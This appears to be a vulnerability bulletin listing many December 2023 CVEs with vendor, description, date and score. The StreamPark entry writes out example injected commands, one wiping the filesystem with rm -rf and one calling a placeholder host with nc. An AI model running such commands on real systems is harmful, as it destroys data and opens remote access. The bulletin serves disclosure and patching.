slawkens -- myaac | A vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2]['subject']/bug[2]['text']/report['subject'] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848. | 2023-12-22 | 3.5 | CVE-2023-7076 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
sourcecodester -- online_student_management_system | A vulnerability has been found in SourceCodester Online Student Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edit-student-detail.php. The manipulation of the argument notmsg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248377 was assigned to this vulnerability. | 2023-12-19 | 2.4 | CVE-2023-6945 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
sourcecodester -- school_visitor_log_e-book | A vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability. | 2023-12-22 | 3.5 | CVE-2023-7059 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
w3c -- online-spellchecker-py | A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability. | 2023-12-23 | 3.1 | CVE-2014-125108 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
wordpress -- wordpress | Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Ricard Torres Thumbs Rating. This issue affects Thumbs Rating: from n/a through 5.0.0. | 2023-12-19 | 3.7 | CVE-2022-45809 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments - wpDiscuz. This issue affects Comments - wpDiscuz: from n/a through 7.6.3. | 2023-12-20 | 2.7 | CVE-2023-46311 audit@patchstack.com |
Severity Not Yet Assigned
Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info |
---|---|---|---|---|
apache -- airflow | Apache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data - more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser - which opens up all kinds of possibilities of misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability | 2023-12-21 | not yet calculated | CVE-2023-47265 security@apache.org security@apache.org security@apache.org |
apache -- airflow | Apache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn't. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2 Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability. | 2023-12-21 | not yet calculated | CVE-2023-48291 security@apache.org security@apache.org security@apache.org |
apache -- airflow | Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser - by the user who also had Airflow UI opened - to trigger the execution of DAGs without the user's consent. Users are advised to upgrade to version 2.8.0 or later which is not affected | 2023-12-21 | not yet calculated | CVE-2023-49920 security@apache.org security@apache.org security@apache.org |
apache -- iotdb | Deserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue. | 2023-12-21 | not yet calculated | CVE-2023-51656 security@apache.org security@apache.org |
apache -- airflow | Apache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission, to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue | 2023-12-21 | not yet calculated | CVE-2023-50783 security@apache.org security@apache.org security@apache.org |
apple -- macos | A session rendering issue was addressed with improved session tracking. This issue is fixed in macOS Sonoma 14.2.1. A user who shares their screen may unintentionally share the incorrect content. | 2023-12-19 | not yet calculated | CVE-2023-42940 product-security@apple.com product-security@apple.com |
array -- arrayos_ag | MotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected. | 2023-12-22 | not yet calculated | CVE-2023-51707 cve@mitre.org |
assetwise_integrity_information_server -- assetwise_integrity_information_server | Bentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25. | 2023-12-22 | not yet calculated | CVE-2023-51708 cve@mitre.org |
bcoin-org -- bcoin | An issue was discovered in bcoin-org bcoin version 2.2.0, allows remote attackers to obtain sensitive information via weak hashing algorithms in the component \vendor\faye-websocket.js. | 2023-12-21 | not yet calculated | CVE-2023-50475 cve@mitre.org cve@mitre.org |
blinksocks -- blinksocks | An issue was discovered in blinksocks version 3.3.8, allows remote attackers to obtain sensitive information via weak encryption algorithms in the component /presets/ssr-auth-chain.js. | 2023-12-21 | not yet calculated | CVE-2023-50481 cve@mitre.org cve@mitre.org |
buildkite -- elastic_ci_for_aws | A symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. | 2023-12-22 | not yet calculated | CVE-2023-43116 cve@mitre.org |
buildkite -- elastic_ci_for_aws | A time-of-check-time-of-use race condition vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to bypass a symbolic link check for the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. | 2023-12-22 | not yet calculated | CVE-2023-43741 cve@mitre.org |
cacti -- cacti | Reflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25, allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php. | 2023-12-22 | not yet calculated | CVE-2023-50569 cve@mitre.org cve@mitre.org |
cams_biometrics -- multiple_products | SQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component. | 2023-12-15 | not yet calculated | CVE-2023-48050 cve@mitre.org |
cesanta -- mjs | Buffer Overflow vulnerability in Cesanta MJS version 2.22.0, allows attackers to execute arbitrary code, cause a denial of service (Dos), and obtain sensitive information via segmentation fault can occur in getprop_builtin_foreign when input string includes a name of Built-in APIs. | 2023-12-20 | not yet calculated | CVE-2023-50044 cve@mitre.org cve@mitre.org |
cryptopp -- cryptopp | Crypto++ (aka cryptopp) through 8.9.0 has a Marvin side channel during decryption with PKCS#1 v1.5 padding. | 2023-12-18 | not yet calculated | CVE-2023-50979 cve@mitre.org |
cryptopp -- cryptopp | gf2n.cpp in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (application crash) via DER public-key data for an F(2^m) curve, if the degree of each term in the polynomial is not strictly decreasing. | 2023-12-18 | not yet calculated | CVE-2023-50980 cve@mitre.org |
cryptopp -- cryptopp | ModularSquareRoot in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (infinite loop) via crafted DER public-key data associated with squared odd numbers, such as the square of 268995137513890432434389773128616504853. | 2023-12-18 | not yet calculated | CVE-2023-50981 cve@mitre.org |
cuppacms -- cuppacms | SQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter. | 2023-12-20 | not yet calculated | CVE-2023-47990 cve@mitre.org |
devolutions -- remote_desktop_manager | Inadequate validation of permissions when employing remote tools and macros via the context menu within Devolutions Remote Desktop Manager versions 2023.3.31 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature. This affects only SQL data sources. | 2023-12-21 | not yet calculated | CVE-2023-7047 security@devolutions.net |
filerun -- filerun | FileRun 20220519 allows SQL Injection via the "dir" parameter in a /?module=users§ion=cpanel&page=list request. | 2023-12-22 | not yet calculated | CVE-2022-47532 cve@mitre.org |
free5gc -- free5gc | An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message. | 2023-12-22 | not yet calculated | CVE-2023-49391 cve@mitre.org |
google -- chrome | Insufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High) | 2023-12-20 | not yet calculated | CVE-2023-3742 chrome-cve-admin@google.com chrome-cve-admin@google.com |
google -- chrome | Heap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2023-12-21 | not yet calculated | CVE-2023-7024 chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com chrome-cve-admin@google.com |
heimdal -- thor_agent | An issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to bypass network filtering, execute arbitrary code, and obtain sensitive information via DarkLayer Guard threat prevention module. | 2023-12-21 | not yet calculated | CVE-2023-29485 cve@mitre.org |
heimdal -- thor_agent | An issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component. | 2023-12-21 | not yet calculated | CVE-2023-29486 cve@mitre.org |
heimdal -- thor_agent | An issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to cause a denial of service (DoS) via the Threat To Process Correlation threat prevention module. | 2023-12-21 | not yet calculated | CVE-2023-29487 cve@mitre.org |
huggingface -- transformers | Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36. | 2023-12-19 | not yet calculated | CVE-2023-6730 security@huntr.dev security@huntr.dev |
huggingface -- transformers | Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36. | 2023-12-20 | not yet calculated | CVE-2023-7018 security@huntr.dev security@huntr.dev |
ivanti -- avalanche | An attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack. | 2023-12-19 | not yet calculated | CVE-2021-22962 support@hackerone.com |
ivanti -- avalanche | An unauthenticated attacked could send a specifically crafted web request causing a Server-Side Request Forgery (SSRF) in Ivanti Avalanche Remote Control server. | 2023-12-19 | not yet calculated | CVE-2023-46262 support@hackerone.com |
ivanti -- avalanche | An attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack. | 2023-12-19 | not yet calculated | CVE-2023-46266 support@hackerone.com |
libming -- libming | Buffer Overflow vulnerability in libming version 0.4.8, allows attackers to execute arbitrary code and obtain sensitive information via parser.c component. | 2023-12-20 | not yet calculated | CVE-2023-50628 cve@mitre.org cve@mitre.org |
linotp -- linotp | Defective request context handling in Self Service in LinOTP 3.x before 3.2.5 allows remote unauthenticated attackers to escalate privileges, thereby allowing them to act as and with the permissions of another user. Attackers must generate repeated API requests to trigger a race condition with concurrent user activity in the self-service portal. | 2023-12-19 | not yet calculated | CVE-2023-49706 cve@mitre.org cve@mitre.org cve@mitre.org |
lockss-daemon -- lockss-daemon | lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick. | 2023-12-15 | not yet calculated | CVE-2023-42183 cve@mitre.org |
ltb_self_service_password -- ltb_self_service_password | An issue in LTB Self Service Password before v.1.5.4 allows a remote attacker to execute arbitrary code and obtain sensitive information via hijack of the SMS verification code function to arbitrary phone. | 2023-12-21 | not yet calculated | CVE-2023-49032 cve@mitre.org cve@mitre.org |
mediawiki -- mediawiki | An issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights. | 2023-12-22 | not yet calculated | CVE-2023-51704 cve@mitre.org |
mlflow -- mlflow | with only one user interaction(download a malicious config), attackers can gain full command execution on the victim system. | 2023-12-19 | not yet calculated | CVE-2023-6940 security@huntr.dev security@huntr.dev |
mlflow -- mlflow | A malicious user could use this issue to access internal HTTP(s) servers and in the worst case (ie: aws instance) it could be abuse to get a remote code execution on the victim machine. | 2023-12-20 | not yet calculated | CVE-2023-6974 security@huntr.dev security@huntr.dev |
mlflow -- mlflow | A malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information. | 2023-12-20 | not yet calculated | CVE-2023-6975 security@huntr.dev security@huntr.dev |
mlflow -- mlflow | This vulnerability is capable of writing arbitrary files into arbitrary locations on the remote filesystem in the context of the server process. | 2023-12-20 | not yet calculated | CVE-2023-6976 security@huntr.dev security@huntr.dev |
mlflow -- mlflow | This vulnerability enables malicious users to read sensitive files on the server. | 2023-12-20 | not yet calculated | CVE-2023-6977 security@huntr.dev security@huntr.dev |
mp3gain -- mp3gain | A stack buffer overflow vulnerability in MP3Gain v1.6.2 allows an attacker to cause a denial of service via the WriteMP3GainAPETag function at apetag.c:592. | 2023-12-22 | not yet calculated | CVE-2023-49356 cve@mitre.org |
multiple_vendors -- multiple_products | Matrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate. | 2023-12-22 | not yet calculated | CVE-2023-24609 cve@mitre.org cve@mitre.org |
nintendo -- ds | DS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client's machine via a modified GPCM message. | 2023-12-20 | not yet calculated | CVE-2023-45887 cve@mitre.org cve@mitre.org |
nos_client -- nos_client | An issue was discovered in nos client version 0.6.6, allows remote attackers to escalate privileges via getRPCEndpoint.js. | 2023-12-21 | not yet calculated | CVE-2023-50477 cve@mitre.org cve@mitre.org |
openssh -- openssh | The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust. | 2023-12-18 | not yet calculated | CVE-2023-48795 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
pdf24_creator -- pdf24_creator | An issue was discovered in PDF24 Creator 11.14.0. The configuration of the msi installer file was found to produce a visible cmd.exe window when using the repair function of msiexec.exe. This allows an unprivileged local attacker to use a chain of actions (e.g., an oplock on faxPrnInst.log) to open a SYSTEM cmd.exe. | 2023-12-19 | not yet calculated | CVE-2023-49147 cve@mitre.org cve@mitre.org cve@mitre.org |
phpsysinfo -- phpsysinfo | Cross Site Request Forgery (CSRF) vulnerability in Phpsysinfo version 3.4.3 allows a remote attacker to obtain sensitive information via a crafted page in the XML.php file. | 2023-12-19 | not yet calculated | CVE-2023-49006 cve@mitre.org cve@mitre.org cve@mitre.org |
proftpd -- proftpd | make_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics. | 2023-12-22 | not yet calculated | CVE-2023-51713 cve@mitre.org cve@mitre.org cve@mitre.org |
qbit-matui -- qbit-matui | Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in index.js file. | 2023-12-21 | not yet calculated | CVE-2023-50473 cve@mitre.org cve@mitre.org |
ruijie -- ws6008 | Ruijie WS6008 v1.x v2.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 and WS6108 v1.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 was discovered to contain a command injection vulnerability via the function downFiles. | 2023-12-20 | not yet calculated | CVE-2023-50993 cve@mitre.org |
s-cms -- s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_newsauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51048 cve@mitre.org |
s-cms -- s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_bbsauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51049 cve@mitre.org |
s-cms -- s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_productauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51050 cve@mitre.org |
s-cms -- s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_textauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51051 cve@mitre.org |
s-cms -- s-cms | S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_formauth parameter at /admin/ajax.php. | 2023-12-21 | not yet calculated | CVE-2023-51052 cve@mitre.org |
smartertools -- smartermail | SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS by using image/svg+xml and an uploaded SVG document. This occurs because the application tries to allow youtube.com URLs, but actually allows youtube.com followed by an @ character and an attacker-controlled domain name. | 2023-12-21 | not yet calculated | CVE-2023-48114 cve@mitre.org cve@mitre.org |
smartertools -- smartermail | SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored DOM XSS because an XSS protection mechanism is skipped when messageHTML and messagePlainText are set in the same request. | 2023-12-21 | not yet calculated | CVE-2023-48115 cve@mitre.org cve@mitre.org |
smartertools -- smartermail | SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS via a crafted description of a Calendar appointment. | 2023-12-21 | not yet calculated | CVE-2023-48116 cve@mitre.org cve@mitre.org |
softing -- edgeaggregator | Softing edgeAggregator Restore Configuration Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of backup zip files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this to execute code in the context of root. Was ZDI-CAN-20543. | 2023-12-19 | not yet calculated | CVE-2023-38126 zdi-disclosures@trendmicro.com |
stormshield_network_security -- stormshield_network_security | An issue was discovered in Stormshield Network Security (SNS) 3.7.0 through 3.7.39, 3.11.0 through 3.11.27, 4.3.0 through 4.3.22, 4.6.0 through 4.6.9, and 4.7.0 through 4.7.1. It's possible to know if a specific user account exists on the SNS firewall by using remote access commands. | 2023-12-21 | not yet calculated | CVE-2023-41166 cve@mitre.org |
stormshield_network_security -- stormshield_network_security | An issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.21, 4.4.0 through 4.6.8, and 4.7.0. Sending a crafted ICMP packet may lead to a crash of the ASQ engine. | 2023-12-21 | not yet calculated | CVE-2023-47093 cve@mitre.org |
streampark -- streampark | In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & | 2023-12-15 | not yet calculated | CVE-2023-49898 security@apache.org |
sudo -- sudo | Sudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit. | 2023-12-22 | not yet calculated | CVE-2023-42465 cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org cve@mitre.org |
thirty_bees -- thirty_bees | A stored cross-site scripting (XSS) vulnerability in the component admin/AdminRequestSqlController.php of thirty bees before 1.5.0 allows attackers to execute arbitrary web script or HTML via $e->getMessage() error mishandling. | 2023-12-22 | not yet calculated | CVE-2023-45957 cve@mitre.org cve@mitre.org cve@mitre.org |
totolink -- a3700r | There is an arbitrary command execution vulnerability in the setDiagnosisCfg function of the cstecgi .cgi of the TOTOlink A3700R router device in its firmware version V9.1.2u.5822_B20200513. | 2023-12-22 | not yet calculated | CVE-2023-50147 cve@mitre.org |
totolink -- ex1200l | TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface. | 2023-12-22 | not yet calculated | CVE-2023-51033 cve@mitre.org |
totolink -- ex1200l | TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface. | 2023-12-22 | not yet calculated | CVE-2023-51034 cve@mitre.org |
totolink -- ex1200l | TOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution on the cstecgi.cgi NTPSyncWithHost interface. | 2023-12-22 | not yet calculated | CVE-2023-51035 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanPriDns parameter' of the setLanConfig interface of the cstecgi .cgi | 2023-12-22 | not yet calculated | CVE-2023-51011 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanGateway parameter' of the setLanConfig interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51012 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanNetmask parameter' of the setLanConfig interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51013 cve@mitre.org |
totolink -- ex1800t | TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanSecDns parameter' of the setLanConfig interface of the cstecgi .cgi | 2023-12-22 | not yet calculated | CVE-2023-51014 cve@mitre.org |
totolink -- ex1800t | TOTOLINX EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the 'enable parameter' of the setDmzCfg interface of the cstecgi .cgi | 2023-12-22 | not yet calculated | CVE-2023-51015 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51016 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanIp parameter' of the setLanConfig interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51017 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'opmode' parameter of the setWiFiApConfig interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51018 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'key5g' parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51019 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'langType' parameter of the setLanguageCfg interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51020 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'merge' parameter of the setRptWizardCfg interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51021 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'langFlag' parameter of the setLanguageCfg interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51022 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the 'host_time' parameter of the NTPSyncWithHost interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51023 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'tz' parameter of the setNtpCfg interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51024 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the 'admuser' parameter of the setPasswordCfg interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51025 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'hour' parameter of the setRebootScheCfg interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51026 cve@mitre.org |
totolink -- ex1800t | TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'apcliAuthMode' parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi. | 2023-12-22 | not yet calculated | CVE-2023-51027 cve@mitre.org |
totolink -- ex1800t | TOTOLINK EX1800T 9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the apcliChannel parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi. | 2023-12-22 | not yet calculated | CVE-2023-51028 cve@mitre.org |
